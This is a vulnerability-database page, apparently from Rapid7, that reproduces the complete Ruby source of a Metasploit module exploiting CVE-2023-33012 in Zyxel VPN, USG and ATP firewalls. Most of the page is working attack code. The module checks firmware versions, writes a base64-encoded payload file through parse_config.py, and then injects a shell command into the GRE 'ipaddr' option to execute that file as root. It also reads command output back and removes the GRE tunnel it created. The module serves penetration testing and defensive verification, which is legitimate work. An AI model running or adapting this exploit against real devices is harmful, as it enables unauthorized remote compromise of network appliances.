Lucene search

SSD Secure Disclosure technical team, jheysel-r7MSF:EXPLOIT-LINUX-HTTP-ZYXEL_PARSE_CONFIG_RCE-

HistoryMay 10, 2024 - 4:01 p.m.

Zyxel parse_config.py Command Injection

2024-05-1016:01:58

SSD Secure Disclosure technical team, jheysel-r7

www.rapid7.com

zyxel

command injection

vulnerability

vpn

usg

apt series

CVSS3

8.8

Attack Vector

ADJACENT

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

7.3

Confidence

Low

EPSS

0.011

Percentile

84.7%

JSON

This module exploits vulnerabilities in multiple Zyxel devices including the VPN, USG and APT series. The affected firmware versions depend on the device module, see this module’s documentation for more details. Note this module was unable to be tested against a real Zyxel device and was tested against a mock environment. If you run into any issues testing this in a real environment we kindly ask you raise an issue in metasploit’s github repository: https://github.com/rapid7/metasploit-framework/issues/new/choose

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Zyxel parse_config.py Command Injection',
        'Description' => %q{
          This module exploits vulnerabilities in multiple Zyxel devices including the VPN, USG and APT series.
          The affected firmware versions depend on the device module, see this module's documentation for more details.

          Note this module was unable to be tested against a real Zyxel device and was tested against a mock environment.
          If you run into any issues testing this in a real environment we kindly ask you raise an issue in
          metasploit's github repository: https://github.com/rapid7/metasploit-framework/issues/new/choose
        },
        'Author' => [
          'SSD Secure Disclosure technical team', # discovery
          'jheysel-r7' # Msf module
        ],
        'References' => [
          [ 'URL', 'https://ssd-disclosure.com/ssd-advisory-zyxel-vpn-series-pre-auth-remote-command-execution/'],
          [ 'CVE', '2023-33012']
        ],
        'License' => MSF_LICENSE,
        'Platform' => ['linux', 'unix'],
        'Privileged' => true,
        'Arch' => [ ARCH_CMD ],
        'Targets' => [
          [ 'Automatic Target', {}]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2024-01-24',
        'Notes' => {
          'Stability' => [ CRASH_SAFE, ],
          'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES ],
          'Reliability' => [ ] # This vulnerability can only be exploited once, more info: https://vulncheck.com/blog/zyxel-cve-2023-33012#you-get-one-shot
        }
      )
    )

    register_options(
      [
        OptString.new('WRITABLE_DIR', [ true, 'A directory where we can write files', '/tmp' ]),
      ]
    )
  end

  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'ext-js', 'app', 'common', 'zld_product_spec.js')
    })
    return CheckCode::Unknown('No response from /ext-js/app/common/zld_product_spec.js') if res.nil?

    if res.code == 200
      product_match = res.body.match(/ZLDSYSPARM_PRODUCT_NAME1="([^"]*)"/)
      version_match = res.body.match(/ZLDCONFIG_CLOUD_HELP_VERSION=([\d.]+)/)

      if product_match && version_match
        product = product_match[1]
        version = version_match[1]

        if (product.starts_with?('USG') && product.include?('W') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.10')) ||
           (product.starts_with?('USG') && !product.include?('W') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.00')) ||
           (product.starts_with?('ATP') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.10')) ||
           (product.starts_with?('VPN') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.00'))
          return CheckCode::Appears("Product: #{product}, Version: #{version}")
        else
          return CheckCode::Safe("Product: #{product}, Version: #{version}")
        end
      end
    end
    CheckCode::Unknown('Version and product info were unable to be determined.')
  end

  def on_new_session(session)
    super
    command_output = ''
    # Get the most recently created GRE tunnel interface, bring it down then delete it to allow for subsequent module runs.
    if session.type.to_s.eql? 'meterpreter'
      newest_gre = session.sys.process.execute '/bin/sh', "-c \"ip -d link show type gre | grep -oP '^\\d+: \\K[^@]+' | tail -n 1\""
      print_good("Found the most recently created GRE tunnel interface: #{newest_gre}. Going to delete it to allow for subsequent module runs.")
      command_output = session.sys.process.execute '/bin/sh', "-c \"ifconfig #{newest_gre} down && ip tunnel del #{newest_gre} mode gre && echo success\""
    elsif session.type.to_s.eql? 'shell'
      newest_gre = session.shell_command_token "ip -d link show type gre | grep -oP '^\\d+: \\K[^@]+' | tail -n 1"
      print_good("Found the most recently created GRE tunnel interface: #{newest_gre}. Going to delete it to allow for subsequent module runs.")
      command_output = session.shell_command_token "ifconfig #{newest_gre} down && ip tunnel del #{newest_gre} mode gre && echo success"
    end

    if command_output.include?('success')
      print_good('The GRE interface was successfully removed.')
    else
      print_warning('The module failed to remove the GRE interface created by this exploit. Subsequent module runs will likely fail unless unless it\'s successfully removed')
    end
  end

  def exploit
    # Command injection has a 0x14 byte length limit so keep the file name as small as possible.
    # The length limit is also why we leverage the arbitrary file write -> write our payload to the .qrs file then execute it with the command injection.
    filename = rand_text_alpha(1)
    payload_filepath = "#{datastore['WRITABLE_DIR']}/#{filename}.qsr"

    command = payload.raw
    command += ' '
    command += <<~CMD
      2>/var/log/ztplog 1>/var/log/ztplog
      (sleep 10 && /bin/rm -rf #{payload_filepath}) &
    CMD
    command = "echo #{Rex::Text.encode_base64(command)} | base64 -d > #{payload_filepath} ; . #{payload_filepath}"

    file_write_pload = "option proto vti\n"
    file_write_pload += "option #{command};exit\n"
    file_write_pload += "option name 1\n"

    config = Base64.strict_encode64(file_write_pload)
    data = { 'config' => config, 'fqdn' => "\x00" }
    print_status('Attempting to upload the payload via QSR file write...')

    file_write_res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'ztp', 'cgi-bin', 'parse_config.py'),
      'data' => data.to_s
    })
    unless file_write_res && !file_write_res.body.include?('ParseError: 0xC0DE0005')
      fail_with(Failure::PayloadFailed, 'The response from the target indicates the payload transfer was unsuccessful')
    end

    register_files_for_cleanup(payload_filepath)
    print_good("File write was successful, uploaded: #{payload_filepath}")

    cmd_injection_pload = "option proto gre\n"
    cmd_injection_pload += "option name 0\n"
    cmd_injection_pload += "option ipaddr ;. #{payload_filepath};\n"
    cmd_injection_pload += "option netmask 24\n"
    cmd_injection_pload += "option gateway 0\n"
    cmd_injection_pload += "option localip #{Faker::Internet.private_ip_v4_address}\n"
    cmd_injection_pload += "option remoteip #{Faker::Internet.private_ip_v4_address}\n"
    config = Rex::Text.encode_base64(cmd_injection_pload)
    data = { 'config' => config, 'fqdn' => "\x00" }

    cmd_injection_res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'ztp', 'cgi-bin', 'parse_config.py'),
      'data' => data.to_s
    })

    # If the payload being used is for example cmd/unix/generic and not a payload spawning any kind of handler (bind or reverse)
    # we can query the /ztp/cgi-bin/dumpztplog.py for the stdout of the command and print it for the user.
    if payload_instance.connection_type == 'none'
      cmd_output_res = send_request_cgi({
        'method' => 'GET',
        'uri' => normalize_uri(target_uri.path, 'ztp', 'cgi-bin', 'dumpztplog.py')
      })

      if cmd_output_res&.body && !cmd_output_res.body.empty?
        output = cmd_output_res.body.split("</head>\n<body>")[1]
        output = output.split("</body>\n</html>")[0]
        output = output.gsub("\n\n<br>", '')
        output = output.gsub("[IPC]IPC result: 1\n", '')
        print_good("Command output: #{output}")
      else
        print_error("Could not retrieve the command's stout from /ztp/cgi-bin/dumpztplog.py")
      end
    end

    unless cmd_injection_res && !cmd_injection_res.body.include?('ParseError: 0xC0DE0005')
      fail_with(Failure::PayloadFailed, 'The response from the target indicates the payload transfer was unsuccessful')
    end
  end
end